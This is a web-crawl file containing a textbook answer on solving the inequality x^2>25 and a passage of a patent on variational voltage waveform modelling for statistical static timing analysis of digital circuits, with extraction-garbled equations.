{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 48, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9251424670219421, "perplexity": 407.25164680536415}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039746171.27/warc/CC-MAIN-20181119233342-20181120015342-00325.warc.gz"}
https://www.gradesaver.com/textbooks/math/precalculus/precalculus-6th-edition-blitzer/chapter-2-section-2-7-polynomial-and-rational-inequalities-exercise-set-page-415/98
## Precalculus (6th Edition) Blitzer The provided statement is false and the correct statement is “The solution set of ${{x}^{2}}>25$ is $\left( -\infty ,-5 \right)\cup \left( 5,\infty \right).$ ” The provided inequality is: ${{x}^{2}}>25$ Rewrite, the provided inequality as: ${{x}^{2}}-25>0$ In order to get the solution of ${{x}^{2}}>25$ , first equate the function to $0$ , that is solve ${{x}^{2}}-25=0$. Then, \begin{align} & {{x}^{2}}-25=0 \\ & {{x}^{2}}-{{5}^{2}}=0 \\ & \left( x-5 \right)\left( x+5 \right)=0 \end{align} Equating each factor to 0, $x=-5$ or $x=5$ Therefore, the solution set of ${{x}^{2}}>25$ is $\left( -\infty ,-5 \right)\cup \left( 5,\infty \right).$ And thereby, the provided statement is false. The provided statement is false and the correct statement is “The solution set of ${{x}^{2}}>25$ is $\left( -\infty ,-5 \right)\cup \left( 5,\infty \right).$ ”
2019-12-10 23:56:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9992806315422058, "perplexity": 456.52465364881937}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540529516.84/warc/CC-MAIN-20191210233444-20191211021444-00257.warc.gz"}
https://www.sparrho.com/item/representing-and-propagating-a-variational-voltage-waveform-in-statistical-static-timing-analysis-of-digital-circuits/107f5b1/
# REPRESENTING AND PROPAGATING A VARIATIONAL VOLTAGE WAVEFORM IN STATISTICAL STATIC TIMING ANALYSIS OF DIGITAL CIRCUITS Imported: 10 Mar '17 | Published: 09 Oct '08 Soroush Abbaspour, David J. Hathaway, Chandramouli Visweswariah, Jinjun Xiong, Vladimir Zolotov USPTO - Utility Patents ## Abstract An approach that represents and propagates a variational voltage waveform in statistical static timing analysis of digital circuits is described. In one embodiment, there is a statistical static timing analysis tool for analyzing digital circuit designs. The statistical static timing analysis tool includes a variational waveform modeling component that is configured to generate a variational waveform model that approximate arbitrary waveform transformations of waveforms at nodes of a digital circuit. The variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform. A variational waveform propagating component is configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. ## Description ### BACKGROUND This invention relates generally design automation of Very Large Integrated Circuits (VLSI), and more particularly to waveform modeling and propagation in statistical static timing analysis of digital circuits. Static timing analysis (STA) has been used to verify the timing correctness of VLSI circuits. In particular, STA analyzes the VLSI circuits to determine the earliest and latest possible signal arrival times on each logic path or node by propagating signals throughout the gates and interconnects that form the path. The accuracy of timing analysis is heavily dependent on the modeling and propagation of digital signals throughout a design timing graph. The most common and widely used model for transition waveforms of digital signals is the well-known saturated ramp model. The use of the saturated ramp model eases the timing analysis since each voltage waveform is uniquely defined by its arrival time and transition time, also referred to as slew. However, in a real design, the digital signal's shape could be very different from that of the saturated ramp. The actual shape of the gate or interconnect output signals depends on many factors including: the input signal waveform applied to the gate or interconnect, the gate and interconnect topology, the nonlinearities of the gate input capacitances, the coupling and power supply noise, etc. It has been shown that the saturated ramp model is not sufficiently accurate for modeling the complex behavior of signals in high speed deep submicron VLSI circuits. Approximating signal waveforms by saturated ramps can incur as much as 19% error in final timing results. To overcome this problem, there have been several attempts to represent signal waveforms with more advanced models; such as piecewise linear waveforms, Weibull, Gamma and even arbitrary functions. These proposed models have helped to reduce the error of calculating arrival times by as much as 50-80%. These modeling techniques are advantageous, in particular, for static timing with a current source driver model or transistor level timing (TLT) analysis. Both the current source driver model and TLT analysis can easily handle complex waveforms and provide higher accuracy when operating with advanced waveform models. These models have also been employed for accurate coupling noise analysis as well as signal propagation through interconnects. As complementary metal-oxide-semiconductor (CMOS) technology moves toward ultra deep sub-micron (UDSM) technologies, variability becomes the major obstacle for designing high-performance VLSI circuits. Therefore, there is a need for an advanced analysis tool which is capable of handling variability that stems from imperfect CMOS manufacturing processes, environmental factors, and device fatigue phenomena. Variability makes it difficult to verify that a chip will function correctly before releasing it for manufacturing. Statistical static timing analysis (SSTA) is one approach that addresses issues associated with variability. As with its STA counterpart, today's SSTA tools only propagate two components of the digital signals (i.e., arrival time and transition time) by interpreting them as random variables or, perhaps, functions of process parameters modeled as random variables. Despite improving the accuracy of STA, advanced models of signal waveforms are still not very popular for SSTA since SSTA requires variational waveform modeling. The variational waveform modeling can be easily constructed for saturated ramp models of signal waveforms by representing signal transition times and arrival times as random quantities. However, the extension to the advanced models is not straightforward. For instance, one can model the signals with an exponential function and evaluate the timing constant of the exponent as a random quantity. This timing constant is proportional to the slew of a saturated ramp signal. However, an exponential waveform model has only marginal accuracy benefits compared to a traditional saturated ramp model and is not appropriate to mimic the accuracy of more advanced waveform models. Modeling arbitrary signal waveforms with random functions due to the effect of environmental and process variations has also been studied for use in SSTA. In particular, it has been proposed to consider the crossing time of each point of the signal transition as a random quantity. To do that, the signal waveforms are modeled with Marcovian random processes. However, the definition of Marcovian random processes is too broad and contains a wide range of random functions. One of the main features of a Marcovian process is the dependence of each point only on its immediate history. This dependency is statistical, which means that probabilities of the new state depend on the previous states. Waveforms in manufactured chips belong to much narrower class of random functions. Their main property is the fact that the waveform shape can be fully determined by the actual values of environmental and process parameters. In addition, proposed point-wise variational waveform modeling is not efficient for SSTA since each signal is represented with rather a large number of random quantities in canonical, or first order linear, forms. This type of variational waveform modeling results in high memory consumption and it is highly inefficient for production use. Therefore, there is a need for a modeling technique for waveform variation that can be used for SSTA. ### SUMMARY In one embodiment, there is a method for statistical static timing analysis of a digital circuit. In this embodiment, the method comprises: developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. In a second embodiment, there is a computer-readable medium storing computer instructions, which when executed, enables a computer system to perform a statistical static timing analysis of a digital circuit. In this embodiment, the computer instructions comprises developing a variational waveform model to approximate arbitrary waveform transformations of waveforms at nodes of the digital circuit, wherein the variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform; and propagating variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. In a third embodiment, there is a statistical static timing analysis tool for analyzing digital circuit designs. In this embodiment, the tool comprises a variational waveform modeling component that is configured to generate a variational waveform model that approximate arbitrary waveform transformations of waveforms at nodes of a digital circuit. The variational waveform model transforms a nominal waveform into a perturbed waveform in accordance with a plurality of waveform transformation operators that account for variations that occur between the nominal waveform and the perturbed waveform. A variational waveform propagating component is configured to propagate variational waveforms through a timing arc from at least one input to at least one output of the digital circuit in accordance with the variational waveform model. ### DETAILED DESCRIPTION Embodiments of this invention are directed to a general, compact, and efficient variational waveform modeling technique that represents the voltage variation between the source pin and the sink pin of a gate or an interconnect in a VLSI circuit. This variational waveform modeling technique can handle the effect of environmental and manufacturing process sources of variation including the power and ground voltage variations. FIG. 1 illustrates a transient voltage waveform and its saturated ramp approximation. In particular, FIG. 1 shows an exemplary signal transition 101 that would be produced by STA at a point within a circuit as it propagates timing information from circuit primary inputs to circuit primary outputs. Without loss of generality, it is assumed that the signal waveform 101 is monotone. Any signal waveform can be determined by its crossing time points, 102, 103, 104, i.e., time values by which the signal crosses selected voltage levels, 105, 106, 107, respectively. Voltage levels are usually expressed in fractions or percentile of a supply voltage (Vdd) 108. The latest crossing time point corresponding to 0% (100%) point of Vdd for rising (falling) transition is referred to as transition start time 109. A saturated ramp model 110 is one well-known model that presents the digital signals. In the case of saturated ramp modeling, the signal transition is specified by its arrival time 111 and slew 112. The signal arrival time 111 is usually defined as the time when the signal crosses 50% point of Vdd 106 while the signal slew 112 is the duration of the ramp. There are several ways to approximate a signal waveform with a saturated ramp. For instance, a signal waveform might be approximated with a saturated ramp with the same 50% crossing point as the original waveform. The approximated ramp transition time may also be computed as the time difference between 10% of Vdd 105 and 90% of Vdd 107, crossing points of the original waveform multiplied by 1.25. In real circuit scenarios, the signal arrival time and transition time in the design depend on many different factors including the technology and manufacturing process parameters. Due to the statistical nature of technology and manufacturing process parameters, modeling with random variables with determined probability distributions may be used. In parameterized SSTA, every timing quantity (e.g. arrival times, required arrival times, delays, slews) is represented in the first order canonical form as shown in equation 1: $A = a 0 + i = 1 n a i X i + a R R a ( 1 )$ where: • A is the timing quantity in the first order canonical format; • a0 is the nominal value of the timing quantity A; • Xi=Xi{circumflex over (X)}i is the variation of ith sources of variation, Xi, from its nominal value {circumflex over (X)}i; • ai is the sensitivity of the timing quantity A to the process parameter Xi; • Ra is the normalized (zero mean and unit sigma) random variable used to model the uncorrelated variation in quantity A. • aR is the sensitivity of the timing quantity A to the uncorrelated variation Ra. The sources of variation, Xi, in the first order canonical form are usually assumed to have Gaussian distributions with zero means and unit standard deviations. The first order canonical form can be extended to handle non-Gaussian distributions and also to capture the nonlinear dependency of the timing quantities to the sources of variations. In one embodiment of this invention, the concept of first order canonical form is exercised with Gaussian sources of variations for further discussions and can be easily extended to non-Gaussian sources of variation as well as the nonlinear dependence of the timing quantities to the sources of variation. FIGS. 2A-2B show a circuit fragment and perturbation of its signal waveform due to environmental and manufacturing process variation. In particular, FIG. 2A shows a partition of a CMOS design with interconnected NAND gates 201, 202, 203, and inverter gate 204. Without loss of generality, FIG. 2A shows the signal waveform 206 at the output terminal of the inverter 204. It is assumed that the nominal waveform in the design is obtained by setting the sources of variation to their nominal values ({circumflex over (X)}1, {circumflex over (X)}2, . . . ). As shown in FIG. 2B, the nominal voltage waveform 207 at the output terminal of the inverter G 204 is denoted by VG,nom(t). In addition, FIG. 2B shows the perturbed voltage waveform (e.g., due to the variation of process parameters) 208 at the output terminal of the inverter G 204 by VG(t) 208. Also, as shown in FIG. 2(B), crossing times 209 of the perturbed voltage waveform VG(t) 208 for the same voltage level could be different from the corresponding crossing times of the nominal waveform VG,nom(t) 207. It should be added that the variation in the ground and supply voltages may cause the voltage levels of the perturbed waveform to be different from its nominal one 210. As mentioned above, the variation in perturbed waveform VG(t) is a function of many factors including: 1) the variations in the gate input waveform, 2) the variations in gate process parameters, 3) the variations in the gate output load, 4) the variations in supply and ground voltages (Vdd and Vss), etc. Variation in the power supply and ground voltage levels not only cause changes to the crossing times of the gate output waveform VG(t) but also its voltage levels. In contrast, variation of the gate parameters and gate input voltage waveform only affects the crossing times of the perturbed waveform, VG(t) and not the voltage levels. This is valid under the assumption that the leakage current is negligible. In one embodiment of this invention, it is assumed that Tvar is the operator that transforms the nominal waveform Vnom(t) into the perturbed waveform, V(t), due to the effect of process variation as shown in equation 2: xTvar:Vnom(t)V(t) (2) The following are the steps to develop a variational signal waveform model: • 1. A set, S, of primitive waveform transformation operators Tprim,1, Tprim,2, . . . is constructed where each of these operators is in charge of the basic variations of waveforms. None of these operators can be obtained with the superposition of the other operators in the set. Each of these operators has a parameter which defines its amount of change to the nominal waveform. Unit values of the parameters used to define the amount of change for each operator form a basis set for a waveform variation space. • 2. Gven an arbitrary waveform transformation operator T, it is approximated with an optimal superposition of the primitive operators Tprim,1, Tprim,2, . . . such that it results in a minimum approximation error. This technique will help to focus on a smaller set of operators (i.e. only on the primitive operators) instead of dealing with an arbitrary waveform operator. • 3. Next, a set of techniques are developed to propagate variational waveforms through gates and interconnects. As an example, transformation of any saturated ramp signal into another saturated ramp signal is done by transforming the arrival time and slew of the nominal saturated ramp signal. These basic transformation operators are called time shifting and time stretching. Time shifting operator shifts each crossing time of the original waveform by the same amount. Time stretching operator multiplies all the crossing times by a same factor, thereby, affecting the nominal waveform transition time. These two transformations are used to generate a variety of waveforms from a small set of base signal waveforms. Applying the same technique, it is possible to duplicate any waveform transformation operator T with an optimal superposition of time shifting St and time stretching Mt operators. FIGS. 3A and 3B illustrate the time shifting and time stretching operators. Consider signal waveform Vnom(t) with start time t0. Assuming that the time shifting operator St that shifts the nominal waveform Vnom(t) by the value B is shown in equation 3: St(B):Vnom(t)V(t)=Vnom(tB) (3) Similarly, suppose the time stretching operator Mt that stretches the nominal waveform Vnom(t) by a factor A is expressed as follows in equation 4: Mt(A):Vnom(t)V(t)=Vnom(tA(tt0)) (4) If B is a positive (negative) value, then the time shifting operator shifts every crossing time point of the nominal waveform, 301, and, thereby, the arrival time by the same amount B toward the right-hand (left-hand) side. For instance, if B=10 ps, every crossing time points are delayed by 10 ps and, thereby, the arrival time of the shifted waveform, 302, is 10 ps greater than the arrival time of the nominal waveform, 301. If A is positive value, the time stretching operator makes the transition time of the stretched waveform, 304, slower than that of the nominal waveform, 303, since each crossing point of the nominal waveform is delayed by an amount proportional to its time distance from the transition start time t0. For instance, if A=0.1, the crossing time points are delayed by 10% relative to the transition start time. If A is negative, the transition is speeded up (i.e. the slew will decrease). Apparently, time shifting and stretching operators cannot model the waveform perturbations caused by power and ground voltage variations. In order to model these types of waveform transformations, voltage shifting SV and voltage stretching MV operators are introduced. The voltage shifting operator models waveform perturbation due to bouncing of ground voltage Vss. The voltage stretching operator models waveform perturbation due to the variation of the difference between supply and ground voltages Vdd-Vss which usually happens due to power grid voltage drop. The transformation of the nominal waveform by voltage shifting operator Sv is represented as follows in equation 5: Sv(D):Vnom(t)V(t)=Vnom(t)+DVdd,nom (5) where parameter D defines the amount of voltage shift as a fraction of nominal supply voltage Vdd,nom. D=0 means no voltage shift and D=0.1 means that the nominal waveform, 305, is shifted up by 10% of Vdd,nom, thereby, the voltage levels of the shifted waveform, 306, are both greater than the voltage levels of the nominal waveform, 305, by the 10% of the supply voltage (FIG. 3C). Furthermore, the transformation of the nominal waveform by voltage stretching operator Mv is shown as follows in equation 6: Mv(C):Vnom(t)V(t)=Vnom(t)(1+C) (6) where C defines the variation of the waveform voltage relative to its nominal value. C=0 means no voltage stretching and C=0.1 means that each voltage level is increased by 10% of its nominal value. So, if the nominal waveform, 307, transitions from 0 to Vdd then the stretched waveform, 308, transitions from 0 to 1.1 Vdd. Negative values of C will result in voltage level reduction (FIG. 3D). One can approximate any arbitrary waveform transformation operator T with an optimal superposition of the four primitive waveform transformation operators (i.e., time shifting St(B), time stretching Mt(A), voltage shifting Sv(D), and voltage stretching Mv(C)). A first order model approximation for an arbitrary waveform transformation operator T is shown in equation 7 as follows: T=St(B)Mt(A)Sv(D)Mv(C):Vnom(t)V(t)=(1+C)Vnom(tA(ttnom,0)B)+DVdd (7) The main advantage of this representation is that if the nominal waveform Vnom(t) is known, it is easy to compute the perturbed waveform V(t). Moreover, as it is discussed later, one can easily compute the sensitivities of the crossing times to the process parameters. This will help to design efficient algorithms to propagate variational waveforms through gates and interconnects. Note that the aforementioned primitive waveform transformation operators are selected since they are intuitive for constructing variational waveform model. Those skilled in the art will recognize that other primitive waveform transformation operators can be used, including complex ones with higher degrees of freedom which can better approximate arbitrary waveform transformations in a real circuit. Furthermore, those skilled in the art will recognize that equation 7 can be represented in other formats. For example, equation 7 can be represented in the following format shown in FIG. 8: VA,B,C,D(t)=(1+C)Vnom(tA(ttnom,0)B)+DVdd,nom (8) where Vdd,nom is the nominal supply voltage value. Equation 8 is also referred as the first order linear transformation model since the waveform VA,B,C,D(t) is obtained from the nominal waveform Vnom(t) by linear transformations of time and voltage dimensions. However, this equation includes significant amount of nonlinearity by assuming that the nominal waveform Vnom(t) is an arbitrary waveform (i.e. not a saturated ramp). This equation can be also interpreted as a parameterized representation of waveform perturbation. Each parameter A, B, C, and D is in charge of its specific type of waveform perturbations (i.e. A for time stretching, B for time shifting, C for voltage stretching, and D for voltage shifting). Each set of parameter values A, B, C, D defines a unique waveform VA,B,C,D(t) obtained by the perturbation of the nominal waveform Vnom(t). If A=0, B=0, C=0, D=0 the transformed waveform V(t) is exactly the same as the nominal waveform Vnom(t). In general, it may not be possible to represent every perturbed waveform from its nominal waveform in the form of equation 8. This representation only captures the most basic but essential types of variations, i.e. time and voltage shifting and stretching, in the linear format. However, those skilled in the art will recognize that other possible representations exist. For example, one possibility is to add more nonlinear stretching operators to model more degrees of freedom in the waveform variation as shown in equation 9: $V A , B , C , D ( t ) = V nom ( t - A 1 ( t - t nom , 0 ) - A 2 ( t - t nom , 0 ) 2 - - B ) + C 1 V nom ( t - A 1 ( t - t nom , 0 ) - A 2 ( t - t nom , 0 ) 2 - - B ) + C 2 V nom 2 ( t - A 1 ( t - t nom , 0 ) - A 2 ( t - t nom , 0 ) 2 - - B ) + + DV dd , nom ( 9 )$ Due to the effect of environmental and process variation, signal waveforms in the real circuits are different from the computed nominal ones in the absence of variability. If the manufacturing processes are modeled with random variables, the digital signal waveforms can be represented as random functions. This implies that the perturbed waveform at a specific point in a design in one manufactured chip could be different from that at the same point in another manufactured chip. The shape of the waveforms is determined by the actual values of environmental and process parameters. Referring to equation 8, parameters A(X1, X2, . . . ), B(X1, X2, . . . ), C(X1, X2, . . . ), D(X1, X2, . . . ) of variational waveforms are functions of random environmental and process parameters X1, X2, . . . . Thus, as mentioned earlier, a variational waveform can be considered a random function which can be evaluated by the values of environmental and process parameters. Accordingly, the signal crossing time tk in the variational waveform depends on the parameters X1, X2, . . . . Using variational waveform model V(t, X1, X2, . . . ), one can calculate the sensitivity $t k X i$ of crossing time tk to process parameter Xi by computing the derivative of an implicit function V(t,Xi)=Vk=const, as follows in equation 10: $V t dt + V X 1 dX 1 = 0 ( 10 )$ Using equation 10 and collecting terms, the derivative of crossing time with respect to process parameter X is obtained as presented in equation 11. $t X i | V = V k = - V X i V t ( 11 )$ The voltage waveform, V(t), explicitly depends on the parameters X1, X2, . . . due to the dependency of A, B, C, D on the environmental and process parameters i.e. A=A(X1, X2, . . . ), B=B(X1, X2, . . . ), C=C(X1, X2, . . . ), D=D(X1, X2, . . . ). Therefore, chain ruling can be employed to differentiate the variational waveform with respect to the environmental and process parameters. By differentiating the variational waveform (using equation 8) and evaluating the sensitivities at the nominal corner, one can obtain the equations presented below: $V t | V ( t ) = V nom ( t ) = V . nom ( t ) ( 12 ) V X i | V ( t ) = V nom ( t ) = - V . nom ( t ) A X i ( t - t 0 ) - V . nom ( t ) B X i + V nom ( t ) C X i + V dd D dX i ( 13 )$ By substituting the above equations into equation 11 and collecting terms, one can obtain the sensitivity of waveform crossing time of voltage level Vk to parameter Xk evaluated at the nominal process corner as follows in equation 14: $t X i | V ( t ) = V nom ( t ) = V k = A X i ( t - t 0 ) + B X i - C X i V nom ( t ) V . nom ( t ) - D dX i V dd V . nom ( t ) ( 14 )$ Next, it is assumed that the parameters, A, B, C, D in equation 8 can be represented as a linear function of Gaussian process variations as shown in equations 15-18. Note that it is straightforward to extend the proposed technique to any other model other than the linear function of the Gaussian process variations. Suppose the parameters A, B, C, and D are in the following format: $A = i = 1 n a i X i + a n + 1 R a ( 15 ) B = i = 1 n b i X i + b n + 1 R b ( 16 ) C = i = 1 n c i X i + c n + 1 R c ( 17 ) D = i = 1 n d i X i + d n + 1 R d ( 18 )$ where: • Xi=Xi{circumflex over (X)}i is the variation of ith source of variation, Xi, from its nominal value {circumflex over (X)}i; • ai, bi, ci, di are sensitivities of variational parameters A, B, C, D to parameter Xi; • Ra, Rb, Rc, and Rd are normalized (zero mean and unit sigma) random variable employed to model the uncorrelated variations in A, B, C, and D, respectively. • an+1. bn+1, cn+1, dn+1 are sensitivities of variational parameters A, B, C, D to their corresponding uncorrelated sources of variations. If A, B, C, D are in the linear format, the sensitivity of waveform crossing time t at voltage level Vk to parameter Xi at the nominal corner is expressed as follows in equation 19: $t X i | V ( t ) = V nom ( t ) = V k = a i ( t - t 0 ) + b i - c i V nom ( t ) V . nom ( t ) - d i V dd V . nom ( t ) ( 19 )$ On the other hand, the crossing time tk of variational waveform V(t) can be approximated with a first order form as a function of process variation parameters as follows in equation 20: $t k = k , 0 + i = 1 n k , i X i + k , n + 1 R t ( 20 )$ where: • k,0, is the nominal value of the crossing time tk; • Xi=Xi{circumflex over (X)}i is the variation of ith source of variation, Xi, from its nominal value {circumflex over (X)}i; • k,i is the sensitivity of the crossing time tk to the parameter Xi; • Rt is the variation of the uncorrelated random parameter Rt. k,n+1 is the sensitivity of the crossing time tk to the uncorrelated variation Rt. Therefore, given the coefficients ai, bi, ci, di of the variational waveform parameters A, B, C, and D (equations 15-18); each coefficient k,i, in equation 20 can be calculated using equation 19. Parameterized block-based SSTA requires two main operations on signal models: propagation of signals through gates and interconnects and computation of the latest or earliest signal at any node with a fan-in of two or more. Below is a discussion of techniques that handle these operations on variational waveforms for SSTA. Consider the transistor level representation of a CMOS inverter shown in FIG. 4A. If the leakage current is ignored, the steady state voltage level at the gate output terminal is either Vss (Ground voltage, 401) or Vdd (Power supply voltage, 402). Assume that the input waveform slew, 403, does not move outside its legal range (e.g., the range over which the inverter delay has been characterized) even due to the effect of environmental and process variations. Therefore, C and D terms in equation 8 for the output voltage waveform, 404 (i.e. the voltage shifting and stretching operators) are only functions of power (i.e. Vdd) and ground (i.e. Vss) voltage variations and do not depend on either the input waveform variations, 403, or gate parameters variations. Thus, C and D can be derived from equation 9 and equation 10 with the assumption that Vnom,low=0 (i.e. the nominal ground voltage value) and Vnom,high=Vdd,nom (i.e. the nominal supply voltage value) as shown in equations 21 and 22. Note that Vlow is the actual value of ground voltage Vss and Vhigh is the actual value of supply voltage, Vdd. $C = V dd - V ss V dd , nom - 1 ( 21 ) D = V ss - V ss , nom V dd , nom ( 22 )$ In the above equations, Vdd and Vss are in the first order form as a function of process variations. On the other hand, as shown in FIG. 4B, since interconnect does not affect the voltage levels, the steady state voltages at the source pin, 405, and sink pin, 406, of the interconnect are the same. As a result, the C and D terms of the variational waveform at the sink pin of the interconnect, Vout(t) and the source pin of the interconnect. Vin(t), are equal. For any environmental and process parameters, different techniques (e.g. finite differencing or direct/adjoint sensitivity analysis) can be employed to compute the sensitivities of the voltage crossing times point which are not in the scope of this invention. The following is a discussion of how to compute the time shifting and time stretching operators (i.e. A and B terms in equation 8) for propagating them throughout gates and interconnects. Consider the variational waveforms as shown in FIGS. 4A-4B. For any process parameter, sensitivities of the output waveform, 404 and 406, crossing times to environmental and process parameters can be computed using different techniques including finite differencing, direct or adjoint sensitivity analysis. When some advanced gate modeling techniques (such as current source modeling) are used, these sensitivities can be even computed analytically. Referring to FIG. 5, there is a flow chart describing the time shifting and stretching operators (i.e. A, B terms) of the propagated variational waveform, 404 and 406. The process begins at 510 a set of voltage levels V1, V2, . . . is selected such that by propagating their corresponding crossing times t1, t2, . . . , ends up having enough accuracy in the final timing results. Note that there is a trade off between memory requirements versus accuracy versus runtime for choosing the number of voltage levels. Apparently, the required number of voltage levels is a function of the CMOS technology and the waveform shapes. As shown in FIG. 5, the next step 520 is to compute the nominal output waveform Vout,nom(t) using deterministic (i.e. non-variational) model of the gate or the interconnect. Following, in step 530, for each selected voltage level Vk and each process parameter Xi, the sensitivity, $s i , k = t dX i | Vout , nom ( t ) = V k ,$ of crossing time tk of the output waveform Vout(t) to each process parameter Xi is computed and evaluated at the nominal process corners. In step 540, for each process parameter Xi, a least square fitting problem Psens,i is constructed to compute coefficients ai, bi, of the first order model of A and B to match sensitivities si,k of crossing times tk for each voltage level Vk of the output waveform Vout(t). Then coefficients ai, bi, of first order forms A and B are computed by solving each least squares problem Pi. In step 550, for each selected voltage level Vk, the sensitivity sn+1,k of crossing time tk to uncorrelated variations is computed as: $s n + 1 , k = All uncorrelated variations s n + 1 , k , j 2 ( 23 )$ where sn+1,k,j is the sensitivity of crossing time tk to j-th source of uncorrelated variations. Summation is performed across all sources of uncorrelated variations: input variational waveform, ground and supply voltages, the gate (or interconnect) parameters and parameters of its load. In step 560, for each selected voltage level Vk, the variance k2 of its crossing time is computed as $i = 1 n = 1 s i , k 2 .$ In step 570, a least square fitting problem PVar is constructed to compute sensitivities an+1, bn+1 of first order forms A, B to uncorrelated variations by matching variances k2 of crossing times tk. Next, coefficients an+1, bn+1 of first order canonical forms A, B are computed by solving least square problem PVar. Next, using the computed first order forms of terms A and B, the propagated variational waveform is constructed in the canonical form as presented in 580. Below is an explanation of the least square fitting problem Psens,i for computing coefficients ai, bi, of first order forms A and B. In this scenario, V1, V2, . . . are m selected voltage levels; t1, t2, . . . are m corresponding crossing times of the nominal output waveform; si,1, si,2, . . . are sensitivities of crossing times to process parameter Xi. The coefficients ai, bi of first order forms A, B are computed by minimizing the sum of squared errors of sensitivities at each voltage level as follows: $k = 1 m ( s i , k - a i ( t k - t 0 ) - b i + c i V nom ( t k ) V . nom ( t k ) + d i V dd , nom V . nom ( t k ) ) 2 a i , b i min ( 24 )$ If the variation of power and ground voltages is ignored, equation 24 can be simplified as: $k = 1 m ( s i , k - a i ( t k - t 0 ) - b i ) 2 a i , b i min ( 25 )$ Equation 25 is a linear least squares problem. Thus, it can be solved efficiently since it only has two unknown variables, ai, bi, and a limited set of equations (i.e. the number of equations is equal to the number of selected voltage levels). If the crossing times for certain of the selected voltage levels Vk of the waveform are known to have a greater influence on the behavior (e.g., delay) of circuits to which the waveform is applied as an input, the errors for these crossing times may be weighted more heavily in this and subsequent least squares problems, creating a result that more closely approximates the actual waveform around these points. Next, the least squares fitting problem for computing sensitivities an+1, bn+1 of canonical forms A, B to uncorrelated variations is clarified. In this scenario V1, V2, . . . are m selected voltage levels; t1, t2, . . . are m corresponding crossing times of the nominal output waveform; 12, 22, . . . are variances of output waveform crossing times at the selected voltage levels; a1, b1, a2, b2, . . . , an, bn are coefficients of first order forms A,B. Thus, coefficients an+1 and bn+1 of first order forms A, B is computed by minimizing the sum of squared errors of crossing times variances: $k = 1 m ( k 2 - i = 1 n z i , k 2 - y k 2 - a n + 1 2 ( t k - t 0 ) 2 - b n + 1 2 ) 2 a n + 1 2 , b n + 1 2 min ( 26 )$ where: $z i , k = a i ( t k - t 0 ) + b i - c i V nom ( t k ) V . nom ( t k ) - d i V dd , nom V . nom ( t k )$ is the approximated sensitivity of k-th crossing time to process parameter Xi. $y k 2 = c n + 1 2 ( V nom ( t k ) V . nom ( t k ) ) 2 + d n + 1 2 ( V dd , nom V . nom ( t k ) ) 2$ is the k-th crossing time variance component due to voltage shifting and scaling terms C, D. Equation 26 is a linear least square problem with respect to unknown variables an+12 and bn+12. The algorithm presented in FIG. 5 requires sensitivities of output waveform crossing times to process variation parameters at nominal process corner. These values can be obtained from variational model of gates and interconnects. The following is a discussion of an algorithm for computing statistical maximum/minimum of two variational waveforms. These operations are required to calculate the latest/earliest signal at any node with the fan-in of two or more in block-based SSTA. The discussion is limited to linear approximation of statistical minimum/maximum operation and first-order variational representation of time and voltage shifting and scaling terms. However, it is possible to construct an algorithm for higher order approximation of statistical minimum and maximum operation and higher order approximation of shifting and scaling terms. As an example, consider a two input CMOS gate and two variational waveforms v1(t) and v2(t) which are separately propagated from the two gate input terminals to its output terminal using the technique described above. The goal is to compute the best fitted variational waveform vmax(t) (i.e. in the form of equation (8) which approximates the statistical maximums of v1(t) and v2(t) with the minimum error. As explained above, the voltage shifting (C) and voltage stretching (D) of v1(t) and v2(t) must be equal since these terms are functions of the gate power supply and ground voltage variations other than the gate parameters and the gate variational input waveforms. Therefore, the resulted variational maximum waveform will have the same voltage shifting and voltage scaling terms C, D. As a result, only the time shifting and time stretching terms A, B of the variational maximum waveform is computed. To do that, a mixed flavor of the technique presented in FIG. 5 and the well-known statistical max operation is employed. Crossing times of the two waveforms whose max is being computed are represented with their first order canonical forms. Therefore, the statistical maximum of the corresponding crossing time can be computed. Next, the time shifting and time stretching parameters of the variational waveform is computed by fitting sensitivities and standard deviations of the crossing times as explained in FIG. 6. Referring to FIG. 6, a set of voltage levels V1, V2, . . . is selected at 610 such that by propagating their corresponding crossing times t1, t2, . . . , there is enough accuracy in the final arrival times results. Note that there is a trade off between accuracy versus runtime for choosing the number of voltage levels. 